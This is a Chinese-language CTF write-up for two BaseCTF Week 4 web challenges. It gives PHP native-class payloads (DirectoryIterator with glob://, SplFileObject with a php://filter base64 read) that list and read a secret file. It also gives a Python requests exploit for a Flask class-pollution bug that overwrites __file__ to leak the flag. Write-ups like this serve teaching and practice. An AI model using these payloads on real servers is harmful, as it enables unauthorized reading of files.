[Week4] flag直接读取不就行了?
?K=DirectoryIterator&W=glob:///secret/*
J=SplFileObject&H=php://filter/read=convert.base64-encode/resource=/secret/f11444g.php
[Week4] 圣钥之战1.0
进入后可以发现题目说去read找flag
所以访问发现得到源码
from flask import Flask,request
import json
app = Flask(__name__)
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
def is_json(data):
try:
json.loads(data)
return True
except ValueError:
return False
class cls():
def __init__(self):
pass
instance = cls()
@app.route('/', methods=['GET', 'POST'])
def hello_world():
return open('/static/index.html', encoding="utf-8").read()
@app.route('/read', methods=['GET', 'POST'])
def Read():
file = open(__file__, encoding="utf-8").read()
return f"J1ngHong说:你想read flag吗?
那么圣钥之光必将阻止你!
但是小小的源码没事,因为你也读不到flag(乐)
{file}
"
@app.route('/pollute', methods=['GET', 'POST'])
def Pollution():
if request.is_json:
merge(json.loads(request.data),instance)
else:
return "J1ngHong说:钥匙圣洁无暇,无人可以污染!"
return "J1ngHong说:圣钥暗淡了一点,你居然污染成功了?"
if __name__ == '__main__':
app.run(host='0.0.0.0',port=80)
是一道原型链污染(其实从题目提示的污染就可以猜到了)
根据代码我们可以知道是需要发送JSON数据到/pollute,merge函数会尝试将这个 JSON 数据合并到instance对象中,再根据/read目录里的file = open(__file__, encoding="utf-8").read(),可以猜测有可能利用__file__属性打开flag文件查看。
exp:
import requests
import json
url = "http://challenge.basectf.fun:23859/pollute"
data = {
"__class__":{
"__init__":{
"__globals__":{
"__file__":"/../../flag"
}
}
}
}
# 将字典转换为JSON格式的字符串
json_data = json.dumps(data)
# 发送POST请求
response = requests.post(url, data=json_data,headers={'Content-Type': 'application/json'})
print(response.text) //J1ngHong说:圣钥暗淡了一点,你居然污染成功了?
此时再返回题目访问/read即可得到flag